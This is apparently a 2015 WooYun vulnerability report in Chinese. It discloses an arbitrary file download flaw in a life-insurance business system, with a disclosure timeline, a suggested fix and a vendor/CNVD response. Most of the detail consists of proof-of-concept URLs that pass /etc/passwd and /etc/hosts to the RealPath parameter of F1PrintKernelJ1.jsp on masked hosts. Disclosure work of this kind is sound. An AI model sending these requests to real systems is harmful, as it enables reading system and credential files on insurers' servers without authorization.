某寿险业务系统存在通用型任意文件下载漏洞
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0127980
漏洞标题:某寿险业务系统存在通用型任意文件下载漏洞
相关厂商:中科软科技
漏洞作者:路人甲
提交时间:2015-07-23 11:53
公开时间:2015-10-22 16:14
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
漏洞详情
披露状态:
2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-17: 细节向核心白帽子及相关领域专家公开
2015-09-27: 细节向普通白帽子公开
2015-10-07: 细节向实习白帽子公开
2015-10-22: 细节向公众公开
简要描述:
任意文件下载
详细说明:
提供一些案例:
1 2 3 4 5 6 7 | **.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts<br> http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts<br> **.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts<br> **.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts<br> **.**.**.**/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts<br> http://**.**.**.**/ter/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd<br> http://**.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd |
江泰人身保险业务系统**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts
**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd
漏洞证明:
http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd
**.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd
**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts
**.**.**.**/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts
http://**.**.**.**/ter/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd
http://**.**.**.**/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd
修复方案:
控制访问权限,或者删除该下载页面
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-07-2416:13
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.
最新状态:
暂无
评价
原文连接的情况下转载,若非则不得使用我方内容。
